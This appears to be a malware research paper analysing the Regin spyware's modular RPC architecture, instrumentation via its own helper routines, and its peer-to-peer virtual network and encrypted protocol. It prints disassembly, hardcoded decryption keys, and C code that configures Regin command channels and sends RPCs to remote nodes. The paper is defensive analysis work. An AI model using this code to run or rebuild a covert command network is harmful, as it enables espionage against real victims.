2 Instrumentation 7
2.1 RPC Helper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
2.2 RPC Execution Trace . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
3 Networking 11
3.1 Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
3.2 Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
3.3 Digital Signature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
4 Conclusion 18
4.1 Defense Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
4.2 Attacker Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
4.3 Counter-Intelligence Perspective . . . . . . . . . . . . . . . . . . . . . . . . 20
1
Introduction
This study presents malware analysis techniques which leverage instrumentation of ana-
lyzed code to overcome static analysis reverse engineering limitations. Those techniques
are applied to the Regin malware which is a good example of complex malware that does
not exhibit its full potential via simple sandbox executions.
Regin is a build on a Service Oriented Architecture (SOA) where modules are plugged
according to the operation purpose. Such modules are generally not self-activated, they
require a specific context and commands to show the behavior. Facing such malware,
analyst usually fallback on static analysis and toolkit development to decode and decrypt
adversary data saved with the malware.
The need for manual analysis of the malware modules is illustrated by [5] and [4] where
each known Regin module is thoroughly analyzed to enumerate the malicious capabilities.
The present study propose to go beyond such analysis calling modules routines via reuse of
the malware orchestrator. Such technique enable experiment and rapid triage of modules.
Similarly [5] and [4] describe the Virtual File System (VFS) format to enable access to
malware data. [4] even provides code excerpts of a toolkit to re-implement such access.
We rather propose to directly use Regin VFS module to access such data. The latter
approach decreases development time while providing full compatibility.
The main drawback of the present approach is the need of a deep understanding of
Regin internals. Indeed [5] and [4] only scratch the surface of Regin development framework
focusing on modules. The instrumentation the orchestrator require a deep understanding
of the Remote Procedure Call protocol which lies in the internals of the malware. On the
other hand, this additional reverse engineer enable to go beyond usual studies providing
an understanding of the Regin botnet network structure.
The study is divided into 4 sections. Section 1 picture the design of the Regin malware.
The understanding of the sound development standards used to build this malware is the
entry point that enable reuse of the internal malware logic. Section 2 presents the technical
details of the instrumentation describing the key malware structures and routines that
can be reused for the analysis. Section 3 applies the techniques of the preceding section to
the study of the malware networking. This section shows how much high level information
can be extracted from the technical analysis. Finally, Section 4 summarizes findings from
three perspectives: the defense, the attack and the counter-intelligence.
1 Design
The first challenge in reverse engineering Regin is its Service Oriented Architecture (SOA).
Such an architecture is composed of modules which talk with one another via Remote
Procedure Calls (RPC). Modules communicates either locally inside a single instance or
remotely over the global botnet. This architecture enable work distribution over instances
making it easier to operate a large network of probes collecting information.
1.1 Overview
A strong design is implemented to ensure stealthiness, confidentiality, availability, scal-
ability and reliability. The resulting botnet can be safely and securely operated over a
large network with only average skill and low human interaction.
Stealthiness. It is difficult to quickly identify core Regin code as malware. Indeed,
it rather looks like good quality software developed with strong design and strict coding
guidelines. Furthermore implementation details underline stealthiness efforts, for example
a configurable delay between cryptography rounds is implemented to avoid CPU spikes.
Such a delay also dramatically decrease performance, this fact shows that stealthiness is
an important requirement.
Confidentiality. Cryptography is a cornerstone of the implementation. All data is
stored encrypted and network communications leverage asymmetric cryptography for au-
thentication and confidentiality. Indeed the RPC protocol enable end-to-end encryption
with routing so that traffic interception on relays does not disclose the content of the traf-
fic. Furthermore, digital signing is implement to restrict communication to authenticated
Regin node.
Availability. Key network components are always redundantly implemented. Examples
include master nodes, 127.0.0.2 and 127.0.0.3, and central reporting nodes, 127.0.0.4 and
127.0.0.5. Network transport is also redundantly implemented supposedly to palliate
incompatibility.
Scalability. The network structure and protocol are designed to support a large number
of instances. For example master nodes can be locally mapped so that sub-networks obey
to different master nodes balancing load. Furthermore, the internal networking works over
a Virtual Private Network (VPN) overlay providing a 32bit virtual address to each nodes
with routing and network address translation capabilities. This is typical functionality of
large network that are rarely observed in malware but for large botnet infrastructures.
Reliability. Strong design efforts are put in making Regin immune to operator errors.
On one hand, extensive automation is implemented with customization according the
hosting environment. On the other hand double checks are required for key components.
For example, it is very unlikely that an operator would generate unwanted network traffic
to a command and control disclosing botnet assets. Indeed, to enable communications
between two nodes all four: virtual IP, cryptography public key and transport channel
need to be configured. Operators likely use predefined standard configuration which cer-
tainly go through quality/security assessment. Operations can be entrusted to differently
skilled personnel in a tiered service supporting a scalable model.
1.2 Architecture
Each Regin module is a self-contained unit implements specific functionality, such as
cryptography; Module 000f, or compression; Module 000d. Modules can combine several
routines to provide more complex services. For example, module 0007 implements an
encrypted and compressed virtual file systems combining modules 000f and 000d1.
The malware embeds a minimal set of required core modules. Modules are identified
by a 16bits integer as presented in Figure 1. Additional modules can be plug into live a
instance according to the infection purpose. Such additional modules are usually stored
inside the virtual file system supported by modules 0007 and 003d.
1This is illustrated in Section 2.2 Figure 5
ID Functionality
0001 RPC Dispatcher
0007 Virtual File System
0009 Networking
000b Logging
000d Compression
000f Cryptography
0011 RPC Dump
0013 Neighborhood
0019 UDP Transport
0033 Inactivity Triggers
003d Virtual File System
c373 TCP TransportID Functionality
0065 Orchestrator
006b Virtual File System
0071 Compression
0073 Cryptography
00a1 Virtual File System
c3bf Bridge Kernel and User
c427 Host Parameters
c42f Process Watch
c431 Hook Engine
Figure 1: Core Modules
An infection can also feature kernel components. The kernel side implements a second
SOA independent from the user-land side. As a standalone system, it also implement a
set of core modules listed in Figure 1. Note that modules with similar functionality have
identifiers increased by 0x63 with respect to their user land counterpart.
Kernel and user lands communicates via Module c3bf which implements a shared
memory and a notification mechanism hooking on ZwDuplicateObject. In a nutshell
handlers201 and 03 respectively write and read this shared memory transferring RPC
between user and kernel lands. This mechanism might be subject to change in the different
flavors of Regin but the bridge module shall remain module c3bf. This is a benefits of the
SOA architecture; as long as the interface between modules is preserved, the underlying
implementation can be changed without dramatic compatibility issue.
There might exist other flavors of the SOA. According to the author knowledge, stan-
dard nodes always features modules with odd number identifiers. However, modules with
even numbers are referenced in the code such as module 000a which seems to be a central
reporting module.
mov rcx, [rsp+38h+rpc]
mov r8d, 0Ah ;; Module ID
mov rax, [rcx+RPC.module]
mov r9b, 5 ;; Handler ID
mov rdx, [rax+MODULE.regin]
mov rax, [rdx+REGIN.helper]
mov edx, 7F000002h ;; Master node 127.0.0.2
call [rax+HELPER.queueASync] ;; (void rpc, DWORD node, WORD ModID, BYTE HdlID)
Similarly some code stub feature module identifier translation such as the next one
where module identifier 001a is translated into identifier 003d adding constant 0x23.
Such compilation patterns are common where macro are defined in the source code to
adapt constant according to compilation flags. Typically, this pattern suggest that this
code fragment might be compiled either with module 003d or module 001a according to
compilation flags.
2A handler is a routine of a module. This is further explained in Section 2.1
#Src, Hdl, Dst,
0000, 21, 0001,
0000, 23, 0001,
0000, 26, 0001,
0000, 2f, 0001,
0000, 3f, 0001,
0000, 30, 0001,
0000, 32, 0001,
0000, 35, 0001,
0000, 3b, 0001,
0000, 43, 0001,
0000, 44, 0001,
0000, 46, 0001,
0000, 48, 0001,
0000, 4a, 0001,
0004, 32, 0001,
0004, 32, 0033,
0004, 32, 0009,000e, a0, 000f,
000e, a1, 000f,
000e, a2, 000f,
000e, a3, 000f,
000e, e9, 000f,
000a, 04, 000b,
000a, 05, 000b,
000a, 11, 000b,
000a, 28, 000b,
000a, e9, 000b,
0032, 81, 0033,
0032, e9, 0033,
0012, 04, 0013,
0012, 05, 0013,
0012, 06, 0013,
0012, 08, 0013,
0012, 0b, 0013,
0012, e9, 0013,0010, 10, 0011,
0010, 12, 0011,
0010, 13, 0011,
0010, 21, 0011,
0010, 30, 0011,
c372, 04, c373,
0009, 11, 0009,
0009, 12, 0009,
0009, 13, 0009,
0009, 14, 0009,
0009, 15, 0009,
0009, 24, 0009,
0008, 25, 0009,
0008, 26, 0009,
0008, 90, 0009,
0008, 60, 0009,
0008, 61, 0009,
0008, 62, 0009,0008, 63, 0009,
0008, 64, 0009,
0008, 65, 0009,
0008, 66, 0009,
0008, 67, 0009,
0008, 68, 0009,
0008, 69, 0009,
0008, 6a, 0009,
0008, 6b, 0009,
0008, 6c, 0009,
0008, 6e, 0009,
0008, 6f, 0009,
0008, 71, 0009,
0008, 72, 0009,
0008, 73, 0009,
0008, 74, 0009,
0008, 75, 0009,
0008, 76, 0009,0008, 77, 0009,
0008, 78, 0009,
0008, 1c, 0009,
0008, 1d, 0009,
0008, 1e, 0009,
0008, 79, 0009,
0008, 80, 0009,
0008, 7a, 0009,
0008, 7b, 0009,
0008, 81, 0009,
0008, 82, 0009,
0008, 83, 0009,
0008, 84, 0009,
0008, 85, 0009,
0008, e9, 0009,
c41e, e9, 0009,
Figure 2: Module Access Control List
mov rcx, [rsp+78h+rpc] ; rpc
lea edi, [rbx+23h] ; rbx = 1Ah
mov r9b, 3 ; Handler ID
mov r8d, edi ; Module ID
mov edx, 7F000001h ; Local node
call queueRPC
A last example supporting the hypothesis of the existence of several Regin flavor is the
access control list provided by module 0009 handler 1f and presented in Figure 2. This
whitelist grants access to unsigned foreign RPC according to the source module identifier,
the destination handler identifier and the destination module identifier. Typically module
0009 is granted to query module 0009 handlers 11-15, 24 to initiate encrypted communi-
cations via session key exchange. But modules with even number identifiers seem to be
granted greater access.
The main hypothesis resulting from the previous observation is that master nodes are
compiled with different module identifiers providing such node greater control over regular
nodes.
1.3 Remote Procedure Call
Modules features routines indexed by an 8bit integer. Service are delivered querying those
routine through a specific sequence of event.
Marshaling. The client initialize a data structure and write the RPC input. In the
code this has the following form: A RPC stream structure is initialized and a BYTE
value is marshaled into the input buffer. The subsequent code shows that this byte is the
ID on a virtual file system record.
; Create a rpc
lea rdx, [rsp+48h+rpc]
mov r9, [rax+REGIN.helper]
call [r9+HELPER.rpcNew]
test al, al
jz loc_180018624 ; jmp if error
; Marshalling
mov rcx, [rsp+48h+rpc]
mov rax, [rcx+RPC.module]
mov rdx, [rax+MODULE.regin]
mov rax, [rdx+REGIN.helper]
mov dl, bpl ; BYTE to write
call [rax+HELPER.in.writeByte]
test al, al
jz short loc_180018606 ; jmp if error
Queuing. The client send this RPC structure to the local Dispatcher, Module 1, with
parameter specifying the destination address module and routine. This messaging can
either be synchronous or asynchronous. In the former case, the client waits for the RPC to
be processed. In the latter case, the following events are executed in a separate execution
thread while the client continue its execution.
This corresponds to the following code pattern which where the previously initialized
RPC is queued to Module 7 handler 3. This is the virtual file system management module,
the handler 3 reads a file system record which ID is provided as argument: the byte that
has been marshaled into the RPC structure.
; Queueing
mov rcx, [rsp+48h+rpc] ; rpc
lea r8d, [rbx-1] ; module ID rbx = 8
mov r9b, 3 ; handler ID
mov rax, [rcx+RPC.module]
mov rdx, [rax+MODULE.regin]
mov rax, [rdx+REGIN.helper]
mov edx, r12d ; Virtual IP
call [rax+HELPER.rpcQueue]
Orchestration. If the destination is local, 127.0.0.1, then the dispatcher simply apply
the specified routine to the RPC data structure. If the destination is remote, the RPC
structure is transferred to the networking, Module 9, for routing to the destination node
where the local dispatcher applies the appropriate routine. Networking is further detailed
in Section 3.
Unmarchaling. The destination module routine reads the input from the RPC struc-
ture. For example, the following code is the unmarchaling corresponding to the previous
marshaling example.
mov rax, [rcx+RPC.module]
lea rdx, [rsp+78h+id]
mov rcx, [rax+MODULE.regin]
mov rax, [rcx+REGIN.helper]
mov rcx, rdi
call [rax+HELPER.in.readByte]
Processing. The output are processed and output are marshaled back into a dedicated
buffer of the RPC structure. Finally the RPC returns back to the client following the
same steps in the reverse direction.
Continuing the example, the code below achieves the indented processing: read and
decrypt a virtual file system record. Then the output is marshaled in the output buffer
of the RPC structure.
; Processing: read the VFS
mov rcx, cs:vfs ; vfs_structure
lea r9, [rsp+78h+record_size] ; size
lea r8, [rsp+78h+record] ; dst
lea rdx, [rsp+78h+record_id] ; ID
call VFSGetRecord
mov ebx, eax
test eax, eax
jnz loc_18004C76A
; Processing: decrypt the data
mov r8d, dword ptr [rsp+78h+record_size] ; size
mov rdx, [rsp+78h+record_data] ; src
mov rcx, cs:VFSModule ; module
lea rax, [rsp+78h+size]
lea r9, VFSCryptoKey ; key: 73231F4393E19F2F990C17815CFFB401
mov [rsp+78h+psize], rax
lea rax, [rsp+78h+written] ; dst_written_size
mov [rsp+78h+buffer], rax ; dst
mov [rsp+78h+key_size], 10h ; key size
call CryptoDecryptBuffer
mov ebx, eax
test eax, eax
jnz short loc_18004C75C
; Marshalling of the returned value
mov rax, [rdi+RPC.module]
mov r8d, [rsp+78h+size]
mov rdx, [rsp+78h+data]
mov rcx, [rax+MODULE.regin]
mov rax, [rcx+REGIN.helper]
mov rcx, rdi
call [rax+HELPER.out.append]
2 Instrumentation
The previous sections showed that Regin code is strongly structured and designed. Fur-
thermore this malware is very large and features numerous functionality. The usual
response for such malware consists in developing a toolkit to decrypt and decode the
different data storage in order to understand the role of the different infected machines.
This result in substantial development work.
We propose an alternative technique base on the sound structure of this malware.
Instead of developing a toolkit to interpret Regin data, this section presents how to reuse
Regin code. This approach uses instrumentation loading the core module and leveraging
the RPC interface to decode data.
2.1 RPC Helper
The cornerstone of the instrumentation technique is the RPC helper, HELPER , that has
been exhibited in the previous section. Figure 3 presents the methods that are used to
manage the different RPC processing steps.
The RPC helper is the entry door to Regin instrumentation. The following examples
presents how to leverage this helper to interact with a Regin node. The following code
registers a module with id 7eca where Regin instance is the instance of the local node.
/* Get the helper BASE is the base address */
RPC_HELPER* HELPER = (RPC_HELPER*)(BASE + 0x669F0);
/* Create a module */
void* module7eca;
HELPER->modNew(&module7eca, 0x7eca, \regin\_instance)
A module can achieve different function via the implementation of handlers. In order
to make those function accessible to the other modules managed by the dispatcher each
handler need to be registered. For example the following code define a new handler and
register it with id 0x23 where write message is a function that we will present later.
/* Add a module handler */
HELPER->modAddHdl(module7eca, 0x23, writeMsg);
The handler of the module 0x7eca can then be queried by all other modules registered
on the Regin node and by all nodes connected to this node via RPC.
Module handlers typically process data, generating output from input processing. Re-
ginRPC support input and output via a RPC structure featuring an input buffer and
an output buffer. Those buffer can be filled with typed data. In Figure 3, the struc-
ture DATA HELPER list the supported data types including BYTE ,WORD ,DWORD , string, wide
character strings and raw buffer. From an RPC model perspective the compilation of
data is usually denoted marshaling . The previously referenced handler routine writeMsg
is detailed below. It takes a raw buffer from the RPC input and print it on the standard
output.
/* Handler payload */
NTSTATUS
writeMsg(void* rpc){
BYTE* msg = NULL;
/* UnMarshalling */
HELPER->in.readSizeStringBE(rpc, &msg, NULL);
/* Processing */
wprintf(L’’\n >%s\n>’’, msg);
return STATUS_SUCCESS;
}
struct DATA_HELPER{
BYTE(*writepSizeString)(void *rpc, void *src, size_t size, BYTE endianess);
BYTE(*writepSizeStringBE)(void *rpc, void *src, size_t size);
BYTE(*append)(void *rpc, void *src, size_t size);
BYTE(*writeString)(void *rpc, char *s);
BYTE(*writeWString)(void *rpc, wchar_t *s);
BYTE(*writeByte)(void *rpc, BYTE b);
[...] // Similar writers for WORD, DWORD, QWORD and Date structure
BYTE(*SeekEoBuffer)(void *rpc, size_t *outSize);
QWORD field;
BYTE(*readByte)(void *rpc, BYTE* b);
[...] // Similar readers for WORD, DWORD, QWORD and Date structure
BYTE(*readSizeString)(void *rpc, BYTE **buff, DWORD *pSize, int endianess);
BYTE(*readSizeStringBE)(void *rpc, BYTE **buff, DWORD *pSize);
BYTE(*readString)(void *rpc, char **pBuff, size_t size);
BYTE(*readWString)(void *rpc, wchar_t **pBuff);
BYTE(*unReadByte)(void* rpc);
BYTE(*readSize)(void *rpc, void**p);
};
struct RPC_HELPER{
[...] // object internals
NTSTATUS(*modNew)(void** mod, DWORD id, void* regin);
NTSTATUS(*modFree)(void* rpc);
NTSTATUS(*modAckIP)(void* rpc);
NTSTATUS(*modAddHdl)(void* mod, WORD hdlID, void* payload1);
NTSTATUS(*modApplyHdl)(void *mod, void *header, void *in, void *out);
NTSTATUS(*rpcNew)(void *mod, void **rpc);
NTSTATUS(*createAlternateRPC)(void *mod, void **rpc);
NTSTATUS(*rpcFree)(void* rpc);
NTSTATUS(*altRPCFree)(void* queue);
[...] // rpc setters and getters
NTSTATUS(*rpcQueue)(void* rpc, DWORD IP, WORD modID, BYTE hdlID);
NTSTATUS(*rpcASyncQueue)(void *rpc, DWORD IP, WORD modID, BYTE hdlID);
[...] // rpc queueing variants
DATA_HELPER in;
DATA_HELPER out;
[...] // setters and getters
};
Figure 3: RPC Helper
Calling this handler would result in the printing of the message provided as argument.
The following code present how to call this handler sending the string Hello world as input
where 0xb is the length of the string, 0x7eca is the destination module id and 0x23 the
destination handler id.
/* Marshalling */
HELPER->in.writepSizeStringBE(rpc, Hello World, 0xb);
/* Queuing */
status = HELPER->queueRPC(rpc, 0x7f000001, 0x7eca, 0x23);
The second argument, 0x7f000001, is the id of the reception node. This id can be
interpreted as a virtual IP address in Regin virtual network. 0x7f000001 corresponds to
the local loop IP address 127.0.0.0.1 representing the local node. Regin enable to send RPC
to remote nodes specifying destination virtual IP addresses. For example, the following
code sends a RPC to remote Regin node 1.2.3.4.
/* Queue an RPC */
DWORD dstIP = \x01020304;
HELPER->in.writeSizeStringBE(rpc, "Hello World", 12);
status = HELPER->queueRPC(rpc, dstIP, 0x7eca, 0xe0);
In the same way, the source virtual IP address can be extracted from the processed
RPC. The handler routine can then be rewritten to output this information to the stan-
dard output along the sent message.
/* Handler payload */
NTSTATUS
writeMsg(void* rpc){
/* Retrieve RPC context */
BYTE node[4];
HELPER->getNodeAndModuleID(rpc, (DWORD*)&node, NULL);
/* Unmarshalling */
BYTE* msg = NULL;
HELPER->in.readSizeStringBE(rpc, &msg, NULL);
/* Processing */
wprintf(L’’\n%i.%i.%i.%i>%s\n>’’, node[3], node[2], node[1], node[0], msg);
return STATUS_SUCCESS;
}
This section presents the flexibility of the Regin programming framework where a chat
program can be coded with a few lines registering a single handler. Networking and routing
mechanism are built into Regin framework so that Peer to Peer (P2P) command can be
easily programmed. The following section provide further details about the networking.
2.2 RPC Execution Trace
Such an architecture makes difficult to follow execution flows. Since control is transferred
via queues of RPC, the understanding of the data flow is necessary to understand the
control flow. Static reverse engineering is complex and debugging can be tricky because
of the inherent multithreading.
; Trace RPC queuing
bp disp+0x12ba7 ”.echo −−RPC QUEUED −−; .echo Dst IP:;dd (rbx + 0x14) L1;
.echo Dst Module:; dw (rbx + 0x18) L1; .echo Dst Handler:; db (rbx + 0x1a) L1;
.echo Input:; dd poi(rbx + 0x48); g”
; Trace RPC return
bp disp+0x12bab ”.echo −−RPC RETURNS −−; .echo Dst IP:;dd (rbx + 0x14) L1;
.echo Dst Module:; dw (rbx + 0x18) L1; .echo Dst Handler:; db (rbx + 0x1a) L1;
.echo Output:; dd poi(rbx + 0x68);g”
; Trace asynchronous RPC queuing
bp disp+0x12c6e ”.echo −−RPC ASYNC QUEUED −−:; .echo Dst IP:;dd (rbx + 0
x14) L1; .echo Dst Module:; dw (rbx + 0x18) L1; .echo Dst Handler:; db (rbx + 0
x1a) L1; .echo Input:; dd poi(rbx + 0x48);g”
; Trace asynchronous RPC return
bp disp+0x12c71 ”.echo −−RPC ASYNC RETURNS −−:; .echo Dst IP:;dd (rbx +
0x14) L1; .echo Dst Module:; dw (rbx + 0x18) L1; .echo Dst Handler:; db (rbx +
0x1a) L1; .echo Output:; dd poi(rbx + 0x68);g”
Figure 4: Windbg Breakpoints for RPC Tracing
Thus, when analyzing Regin behaviors, is it interesting to trace the execution of RPC.
The windbg breakpoints presented in Figure 4 enable such tracing. Those are inserted
at the beginning and the ending of the routines rpcQueue andrpcASyncQueue from the
helper structure. The breakpoints prints the destination node virtual IP, the destination
module ID and the destination handler ID and the marshaled input of the queued RPC.
At the end of the RPC processing the output is similarly printed.
For example, Figure 5 show the RPC trace resulting from the addition of a known
host public key. This result in a sequence of three RPC. A call to module 0007 handler
02 launches the writing of the public key to the VFS container. This writing is proceeded
by the compression, Module 000d handler 01, and the encryption, module 000f handler
01, of the newly added public key.
3 Networking
3.1 Design
Regin is designed as a peer-to-peer network program, nodes can function either as clients
or as servers to another infected host. However some slight evidences suggest that there is
other Regin flavor that may act as super nodes internally referenced by local loop aliases:
127.0.0.2 and 127.0.0.3 are believed to reference master nodes and 127.0.0.4 and 127.0.0.5
are believed to reference monitoring nodes.
TheRegin network implements a virtual overlay, a VPN, on top of the physical network
of infected host. Regin nodes are assigned virtual IP addresses, module 0009 container
01, so that the the overlay form a virtual network inside the infected physical network.
Modules 0009 and 0013 manage communication inside the virtual network while relying
on transport module such as 0019 (UDP) and c373 (TCP) to exchange data over the
underlying physical network.
The structure of the virtual network is manually defined in module 0009 configuration,
[multicols=2,basicstyle=\tiny\ttfamily,language=rock2]
-- RPC QUEUED --
Dst IP:
00000000‘00187fe4 7f000001;; Local node
Dst Module:
00000000‘00187fe8 000f ;; Module Crypto
Dst Handler:
00000000‘00187fea 53 ;; Add a known host
Input:
00000000‘0208e310 32000007 00000088 01000000 01000000
00000000‘0208e320 552570fb 50659c12 de78301f 0ead5594
-- RPC QUEUED --
Dst IP:
00000000‘0018808c 7f000001;; Local node
Dst Module:
00000000‘00188090 0007 ;; Module VFS
Dst Handler:
00000000‘00188092 02 ;; Write VFS Container
Input: ;; Data to write
00000000‘02088060 0001c001 00000700 00008832 00000000
00000000‘02088070 00000001 2570fb01 659c1255 78301f50
-- RPC QUEUED --
Dst IP:
00000000‘00187e94 7f000001;; Local node
Dst Module:
00000000‘00187e98 000d ;; Module Compression
Dst Handler:
00000000‘00187e9a 01 ;; Deflate
Input: ;; Data to deflate
00000000‘02051490 32000007 00000088 01000000 01000000
00000000‘020514a0 552570fb 50659c12 de78301f 0ead5594
-- RPC RETURNS --
Dst IP:
00000000‘00187e94 7f000001;; Local node
Dst Module:
00000000‘00187e98 000d ;; Module Compression
Dst Handler:
00000000‘00187e9a 01 ;; Deflate
Output: ;; Deflated data00000000‘0204f730 000007fc bb008832 fbbf0701 12552570
00000000‘0204f740 5065ff9c de78301f adff5594 8028c10e
-- RPC QUEUED --
Dst IP:
00000000‘00187e94 7f000001;; Local node
Dst Module:
00000000‘00187e98 000f ;; Module Crypto
Dst Handler:
00000000‘00187e9a 01 ;; Symetric encryption (RC5)
Input: ;; Data to encrypt
00000000‘02051490 00000010 431f2373 2f9fe193 81170c99
00000000‘020514a0 01b4ff5c 00000149 45e96f43 c0010000
-- RPC RETURNS --
Dst IP:
00000000‘00187e94 7f000001;; Local node
Dst Module:
00000000‘00187e98 000f ;; Module Crypto
Dst Handler:
00000000‘00187e9a 01 ;; Symetric encryption
Output: ;; Encrypted data
00000000‘03890390 0601199b 6984694a cb1a09cb 5c8efc9e
00000000‘038903a0 91fd1d2f 1919c50c f771a307 1168bd6b
-- RPC RETURNS --
Dst IP:
00000000‘0018808c 7f000001;; Local node
Dst Module:
00000000‘00188090 0007 ;; Module VFS
Dst Handler:
00000000‘00188092 02 ;; Write to container
Output: ;; No output
-- RPC RETURNS --
Dst IP:
00000000‘00187fe4 7f000001;; Local node
Dst Module:
00000000‘00187fe8 000f ;; Module Crypto
Dst Handler:
00000000‘00187fea 53 ;; Add a known host
Output: ;; No output
Figure 5: RPC Trace of a Know Host Registration
container 03. This configuration, define a list of records with associating virtual IP of
remote nodes to a transport module. Two records can associate a single IP address to
several transport modules for resilience purpose. There is no imposed structure upon the
virtual network. This make Regin network easy to build with the ability to define several
pivots points that are sometime necessary to exploit segmented victim networks.
There is a second overlay on top of the virtual network defined by trusted links.
Similarly to a ssh server, each Regin node feature an list of trusted hosts associated to
the public keys, module 000f container 01. Signed RPC messages from trusted nodes are
directly executed. In this model some nodes only acts as proxy: they receive messages
which a routed to another node inside the virtual network.
Figure 6 presents the topology of a Regin infection. The solid arrows represent the
virtual network overlay and dashed arrows represent the trust overlay. The network is
organized into clusters where some nodes concentrate the traffic with multiple incoming
network connection outgoing trust connections such as XX15f814 and XX15f90b. There
is also relays with interconnect clusters such as XX15bd99. This is a typical topology
of a data collection network with probes distributed in the Victim network reporting to
aggregates.
The dispatcher is only responsible for managing modules and RPC queues. As it has
been underlined in the previous section RPC can also be sent to remote Regin nodes. The
routing of RPC is managed by the module 0009, aka the orchestrator. The orchestra-
tor manage the execution of RPC and the connection channels to remote nodes and the
routing of RPC over the Regin network with the help of the module 0013, aka the router.
Connection channels are implemented by dedicated modules such as module 0x0019 re-
sponsible for UDP channels and module 0xc373 responsible for TCP channels. Channels
module need to implement a common interface for managing incoming and outgoing con-
Figure 6: Virtual Network and Trust Overlays
nections. As long as such an interface is provided, any kind of transport channel can be
support by Regin such as ICMP, steganography, HTTP cookies
Transport channel must feature to phases: initiation and data. Those two phases can
be supported by distinct module, for example initiation can be achieve over UDP port 53
and transport over TCP port 443. Only the initiation channel need to be specified on the
reception node, the data channel is dynamically from the initiation message. Incoming
connection are managed by the handler 06 of the orchestrator, module 0009. This handler
take three parameters as input: a BYTE specifying the action 0 to add a channel, 1 to
remove a channel, a word specifying the transport module managing the incoming con-
nection and a raw buffer which provides connection details such as the listening network
port. For example the following code set an incoming UDP channel, module 0x0019, on
port 53.
/* Configure listening connection on UDP 53 */
/* Marshalling mode 0, module 0019 (UDP), port 53 */
HELPER->in.writeByte(rpc, 0);
HELPER->in.writeWord(rpc, 0x19);
size_t len = wcslen(data) / 2;
HELPER->in.writeSizeStringBE(rpc, 53, 3);
/* Queue the RPC to start listening connections */
status = HELPER->queueRPC(rpc, DST_IP, 9, 6);
Outgoing connections can be defined on the emitting node via the handler 04 of the
orchestrator, module 0009. This handler take more parameters to configure the connection
as it can be observed in the following example.
/* Configure outgoing connection on UDP 53 */
// mode 0: new connection with default parameters
// mode 1: delete connection
// ...
// mode 7: new connection with custom parameters
HELPER->in.writeByte(rpc, 1);
// Virtual IP address on the \regin virtual network
HELPER->in.writeDWord(rpc, 0x00000002);
// Id of the connection
HELPER->in.writeByte(rpc, 1);
// Initiation connection string 192.168.226.235 port 53
HELPER->in.writepSizeStringBE(rpc,
\x00\x00192.168.226.235\x00\x35\x00\x01\x02\x01\x01\x01\x01,26);
// Data connection string 192.168.226.235 port 443
HELPER->in.writepSizeStringBE(rpc,
\x00\x00192.168.226.235\x01\xBB\x00\x01\x02\x01\x01\x01\x01,26);
// delay between initiation retries
HELPER->in.writeByte(rpc, 0x96);
// module for initiation channel 0x0019: UDP
HELPER->in.writeWord(rpc, 0x19); // initiation chan module
// module for data channel 0xc373: TCP
HELPER->in.writeWord(rpc, 0xc373); // data chan module
// connection mode
NTSTATUS status = HELPER->queueRPC(rpc, DST_IP, 0x9, 0x4);
As long as those connection are configured RPC can be remotely sent to the node
virtual IP 0.0.0.2 residing on physical host 192.168.226.235 and listening on UDP port 53.
3.2 Protocol
The present section describe the network protocol on top of the transport protocol that
is the data processed by module 0009. Communication is established by an initialization
message. This message defines the data communication channel specifying a module and
its parameters for data transport. The initialization message is watermarked with the
letters s h i t respectively located at index 8, 0x11, 0x1a and 0x23. Optionally the
initialization message can be RC5 encrypted.
Below we dissect a communications between two Regin nodes. The first one has 0.0.0.1
as virtual IP and 192.168.226.171 as physical IP. It is configured to communicate via
module c373 (TCP) on port 80 for initialization and port 443 for data. The recipient nod
has 0.0.0.2 as virtual IP and 192.168.226.235 as physical IP.
The recipient node only listen on TCP port 80. The communication starts with an
initialization message instructing the recipient node to open a listening thread on TCP
port 443 via module c373. The initialization message typically looks like the following.
;; Ethernet II, Scr: Vmware_27:40:9e, Dst: Vmware_2f:e5:34
;; Internet Protocol V4, Src: 192.168.226.171, Dst: 192.168.226.235
;; Transmission Control Protocol, Src Port: 49209, Dst Port: http (80),
;; Seq: 1, Ack: 1, Len: 127
0000 00 50 56 2f e5 34 00 50 56 27 40 9e 08 00 45 00 .PV/.4.PV’@...E.
0010 00 a7 0c 9a 40 00 80 06 a6 ce c0 a8 e2 ab c0 a8 ....@...........
0020 e2 eb c0 39 00 50 52 24 4c 48 61 b8 15 8b 50 18 ...9.PR.LHa...P.
0030 40 29 cc e9 00 00 @)....
;; Data
0036 41 56 38 41 41 41 42 4f 79 4c AV8AAABOyL
0040 35 7a 61 4b 62 6a 4e 4d 48 69 42 51 68 6f 61 76 5zaKbjNMHiBQhoav
[...]
00a0 43 78 76 5a 51 72 33 4f 59 73 6c 5f 64 36 70 43 CxvZQr3OYsl_d6pC
00b0 75 57 63 46 59 uWcFY
The data is base64 encoded. On decoding we observe marshaled data with endianess
flag, followed by the message size and encrypted data watermarked with the string “s h i t”
as presented in the following hexadecimal dump.
;; Endianess
0000 01 .
;; Length _...
0001 5f 00 00 00
;; Encrypted Data with "shit" watermark
0005 4e c8 be 73 68 a6 e3 34 c1 e2 05 N..sh..4...
^^ s
0010 08 68 6a f2 cc ac ff 78 24 23 69 0b e3 fc 39 5d .hj....x.#i...9]
^^ ^^ h i
0020 60 b0 f4 74 6d 46 e7 f0 fc ed c3 20 16 d7 e7 80 ‘..tmF..... ....
^^ t
0030 fa 42 6e aa 67 f6 62 1c 76 47 8c 73 16 31 07 27 .Bn.g.b.vG.s.1.’
0040 fe 11 a9 fc ca d6 82 c6 50 48 c2 c5 ae 0e 8c 30 ........PH.....0
0050 b1 bd 94 2b dc e6 2c 97 f7 7a a4 2b 96 70 56 ...+..,..z.+.pV
After the watermark removal, the data can be decrypted with the following hardcoded
key:
71 9b b5 05 c8 69 9b 9f f8 6a 38 92 1f de 02 7e
The decrypted message is salted with a random 2-byte word, watermarked with the
16bit integer 31337 and controlled by a CRC32 check-sum. Then follows the connection
string that is served to module 0009 to launch the listening thread. The author does not
have a full understanding of all parameters but it features timeout (like 2800) and number
of retries (02). The main parameters are the recipient IP address 192.168.226.235 and the
port 443.
;; Random word
0000 5b e0 [.
;; Watermark 31337 in decimal
0002 7a 69 zi
;; CRC32 checksum
0004 38 61 f4 42 8a.B
;; Connection parameters (delay, timeout...)
0008 08 02 00 00 00 01 00 00 ........
